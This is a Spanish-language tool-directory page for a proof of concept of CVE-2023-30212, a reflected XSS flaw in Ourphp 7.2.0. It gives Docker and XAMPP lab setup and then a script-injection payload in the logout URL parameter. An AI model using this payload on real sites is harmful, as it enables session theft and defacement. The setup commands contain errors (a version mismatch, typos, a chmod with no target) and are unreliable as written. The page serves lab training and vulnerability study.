Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-30212-POC — Exploit de prueba de concepto para CVE-2023-30212, una vulnerabilidad XSS en Ourphp 7.2.0, incluyendo configuración de Docker y demostración de carga útil. | Kitploit
Herramientas/GitHubGitHub/arunsnap/cve-2023-30212-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubarunsnap/cve-2023-30212-poc

CVE-2023-30212-POC

Exploit de prueba de concepto para CVE-2023-30212, una vulnerabilidad XSS en Ourphp 7.2.0, incluyendo configuración de Docker y demostración de carga útil.

Ver Repositorio
11hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-30212-POC

Creación de un entorno Docker vulnerable y explotación de vulnerabilidad en Ourphp versión 7.2.0 (CVE 2023 30212)

Paso 1. Descargue e instale Docker en su sistema. Estoy usando Docker porque es rápido y fácil instalar Ubuntu

Paso 2. Configurar el entorno Docker

root@kitploit:~
sudo apt-get install docker.io
docker pull ubuntu
docker run -d -t --name test-container -p 80:80 -p 443:44
3 -p 3306:3306 -p 21:21 ubuntu
docker exec -it test-container bash

Paso 3. Instalando dependencias

root@kitploit:~
apt-get update
apt-get install wget
apt-get install nano
apt-get install unzip
apt-get install net-tools
apt-get install locate

Paso 4. Instalar servidor web, php y mysql. Instalaré xampp server para esto.

root@kitploit:~
wget https://liquidtelecom.dl.sourceforge.net/project/xampp/XAMPP%20Linux/7.2.0/xampp-linux-x64-7.2.0-0-installer.run
chmod +x xampp-linux-x64-7.2.0-0-installer.run
./xampp-linux-x64-7.2.0-0-installer.run
cd /opt/lampp
./xmapp start

Paso 5. Descargar Ourphp versión 7.2.0

root@kitploit:~
wget https://zdown.chinaz.com/202305/ourphp-zyb-v7.5.0.20230515.zip
cp ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs
unzip ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs/
chmod -R 777

Paso 6. Configurar Ourphp en el navegador. Abra su navegador e ingrese localhost o 127.0.0.1. Siga las instrucciones e instale Ourphp

Paso 7. Explotando la vulnerabilidad. La versión 7.2.0 de Ourphp tiene una vulnerabilidad XSS (Cross-Site Scripting). Para mitigar la vulnerabilidad en el archivo /client/manage/ourphp_out.php que permite la ejecución de código XSS

inicio de sesión hallazgo

debe modificar el código. La vulnerabilidad surge cuando el parámetro "ourphp_admin" está establecido en "logout", y la variable controlable es "out"

final

Prueba de Concepto

root@kitploit:~
 payload - "</script><script>alert('xss')</script>".
root@kitploit:~
parameter - http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert('xss')</script>

video

vídeo
(https://www.youtube.com/watch?v=l9lHyjY9_X0)

Descargar herramienta